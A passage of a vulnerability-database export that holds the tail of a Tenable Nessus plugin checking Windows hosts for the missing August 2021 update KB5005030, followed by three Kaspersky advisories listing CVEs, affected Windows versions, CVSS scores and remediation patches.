script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:58:15", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005090](<http://support.microsoft.com/kb/5005090>) \n[5005089](<http://support.microsoft.com/kb/5005089>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005095](<http://support.microsoft.com/kb/5005095>) \n[5005088](<http://support.microsoft.com/kb/5005088>) \n[5011525](<http://support.microsoft.com/kb/5011525>) \n[5011534](<http://support.microsoft.com/kb/5011534>) \n[5011552](<http://support.microsoft.com/kb/5011552>) \n[5011529](<http://support.microsoft.com/kb/5011529>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12250 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-03-09T00:00:00", "id": "KLA12250", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12250/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-28T14:22:25", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nRemote Desktop client for Windows Desktop \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://vulners.com/cve/CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://vulners.com/cve/CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://vulners.com/cve/CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://vulners.com/cve/CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://vulners.com/cve/CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://vulners.com/cve/CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://vulners.com/cve/CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://vulners.com/cve/CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://vulners.com/cve/CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://vulners.com/cve/CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://vulners.com/cve/CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://vulners.com/cve/CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://vulners.com/cve/CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://vulners.com/cve/CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://vulners.com/cve/CVE-2021-42287>)6.5High\n\n### *KB list*:\n[5007233](<http://support.microsoft.com/kb/5007233>) \n[5007236](<http://support.microsoft.com/kb/5007236>) \n[5007263](<http://support.microsoft.com/kb/5007263>) \n[5007246](<http://support.microsoft.com/kb/5007246>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12341 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2023-09-28T00:00:00", "id": "KLA12341", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12341/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T15:07:08", "description": "### *Detect date*:\n02/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-24080](<https://nvd.nist.gov/vuln/detail/CVE-2021-24080>) \n[CVE-2021-24103](<https://nvd.nist.gov/vuln/detail/CVE-2021-24103>) \n[CVE-2021-24093](<https://nvd.nist.gov/vuln/detail/CVE-2021-24093>) \n[CVE-2021-1734](<https://nvd.nist.gov/vuln/detail/CVE-2021-1734>) \n[CVE-2021-25195](<https://nvd.nist.gov/vuln/detail/CVE-2021-25195>) \n[CVE-2021-24086](<https://nvd.nist.gov/vuln/detail/CVE-2021-24086>) \n[CVE-2021-1727](<https://nvd.nist.gov/vuln/detail/CVE-2021-1727>) \n[CVE-2021-24102](<https://nvd.nist.gov/vuln/detail/CVE-2021-24102>) \n[CVE-2021-24094](<https://nvd.nist.gov/vuln/detail/CVE-2021-24094>) \n[CVE-2021-24076](<https://nvd.nist.gov/vuln/detail/CVE-2021-24076>) \n[CVE-2021-24078](<https://nvd.nist.gov/vuln/detail/CVE-2021-24078>) \n[CVE-2021-24084](<https://nvd.nist.gov/vuln/detail/CVE-2021-24084>) \n[CVE-2021-24075](<https://nvd.nist.gov/vuln/detail/CVE-2021-24075>) \n[CVE-2021-24082](<https://nvd.nist.gov/vuln/detail/CVE-2021-24082>) \n[CVE-2021-1731](<https://nvd.nist.gov/vuln/detail/CVE-2021-1731>) \n[CVE-2021-24083](<https://nvd.nist.gov/vuln/detail/CVE-2021-24083>) \n[CVE-2021-24079](<https://nvd.nist.gov/vuln/detail/CVE-2021-24079>) \n[CVE-2021-24096](<https://nvd.nist.gov/vuln/detail/CVE-2021-24096>) \n[CVE-2021-1722](<https://nvd.nist.gov/vuln/detail/CVE-2021-1722>) \n[CVE-2021-24098](<https://nvd.nist.gov/vuln/detail/CVE-2021-24098>) \n[CVE-2021-24074](<https://nvd.nist.gov/vuln/detail/CVE-2021-24074>) \n[CVE-2021-24088](<https://nvd.nist.gov/vuln/detail/CVE-2021-24088>) \n[CVE-2021-24081](<https://nvd.nist.gov/vuln/detail/CVE-2021-24081>) \n[CVE-2021-24077](<https://nvd.nist.gov/vuln/detail/CVE-2021-24077>) \n[CVE-2021-1698](<https://nvd.nist.gov/vuln/detail/CVE-2021-1698>) \n[CVE-2021-24106](<https://nvd.nist.gov/vuln/detail/CVE-2021-24106>) \n[CVE-2021-1732](<https://nvd.nist.gov/vuln/detail/CVE-2021-1732>) \n[CVE-2021-24091](<https://nvd.nist.gov/vuln/detail/CVE-2021-24091>) \n[CVE-2020-17162](<https://nvd.nist.gov/vuln/detail/CVE-2020-17162>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-24080](<https://vulners.com/cve/CVE-2021-24080>)4.3Warning \n[CVE-2021-24103](<https://vulners.com/cve/CVE-2021-24103>)4.6Warning \n[CVE-2021-24093](<https://vulners.com/cve/CVE-2021-24093>)6.8High \n[CVE-2021-1734](<https://vulners.com/cve/CVE-2021-1734>)5.0Warning \n[CVE-2021-25195](<https://vulners.com/cve/CVE-2021-25195>)4.6Warning \n[CVE-2021-24086](<https://vulners.com/cve/CVE-2021-24086>)5.0Warning \n[CVE-2021-1727](<https://vulners.com/cve/CVE-2021-1727>)4.6Warning \n[CVE-2021-24102](<https://vulners.com/cve/CVE-2021-24102>)4.6Warning \n[CVE-2021-24094](<https://vulners.com/cve/CVE-2021-24094>)7.5Critical \n[CVE-2021-24076](<https://vulners.com/cve/CVE-2021-24076>)2.1Warning \n[CVE-2021-24078](<https://vulners.com/cve/CVE-2021-24078>)7.5Critical \n[CVE-2021-24084](<https://vulners.com/cve/CVE-2021-24084>)4.9Warning \n[CVE-2021-24075](<https://vulners.com/cve/CVE-2021-24075>)3.5Warning \n[CVE-2021-24082](<https://vulners.com/cve/CVE-2021-24082>)4.0Warning \n[CVE-2021-1731](<https://vulners.com/cve/CVE-2021-1731>)2.1Warning \n[CVE-2021-24083](<https://vulners.com/cve/CVE-2021-24083>)6.8High \n[CVE-2021-24079](<https://vulners.com/cve/CVE-2021-24079>)2.1Warning \n[CVE-2021-24096](<https://vulners.com/cve/CVE-2021-24096>)4.6Warning \n[CVE-2021-1722](<https://vulners.com/cve/CVE-2021-1722>)7.5Critical \n[CVE-2021-24098](<https://vulners.com/cve/CVE-2021-24098>)2.1Warning \n[CVE-2021-24074](<https://vulners.com/cve/CVE-2021-24074>)7.5Critical \n[CVE-2021-24088](<https://vulners.com/cve/CVE-2021-24088>)6.5High \n[CVE-2021-24081](<https://vulners.com/cve/CVE-2021-24081>)6.8High \n[CVE-2021-24077](<https://vulners.com/cve/CVE-2021-24077>)7.5Critical \n[CVE-2021-1698](<https://vulners.com/cve/CVE-2021-1698>)4.6Warning \n[CVE-2021-24106](<https://vulners.com/cve/CVE-2021-24106>)2.1Warning \n[CVE-2021-1732](<https://vulners.com/cve/CVE-2021-1732>)4.6Warning \n[CVE-2021-24091](<https://vulners.com/cve/CVE-2021-24091>)6.8High \n[CVE-2020-17162](<https://vulners.com/cve/CVE-2020-17162>)6.5High\n\n### *KB list*:\n[4577048](<http://support.microsoft.com/kb/4577048>) \n[4571756](<http://support.microsoft.com/kb/4571756>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4577032](<http://support.microsoft.com/kb/4577032>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4577015](<http://support.microsoft.com/kb/4577015>) \n[4577066](<http://support.microsoft.com/kb/4577066>) \n[4574727](<http://support.microsoft.com/kb/4574727>) \n[4577071](<http://support.microsoft.com/kb/4577071>) \n[4577038](<http://support.microsoft.com/kb/4577038>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[4601357](<http://support.microsoft.com/kb/4601357>) \n[4601348](<http://support.microsoft.com/kb/4601348>) \n[4601318](<http://support.microsoft.com/kb/4601318>) \n[4601384](<http://support.microsoft.com/kb/4601384>) \n[4601349](<http://support.microsoft.com/kb/4601349>) \n[4601331](<http://support.microsoft.com/kb/4601331>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "kaspersky", "title": "KLA12071 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17162", "CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-09-28T00:00:00", "id": "KLA12071", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12071/", "cvss": {"score": 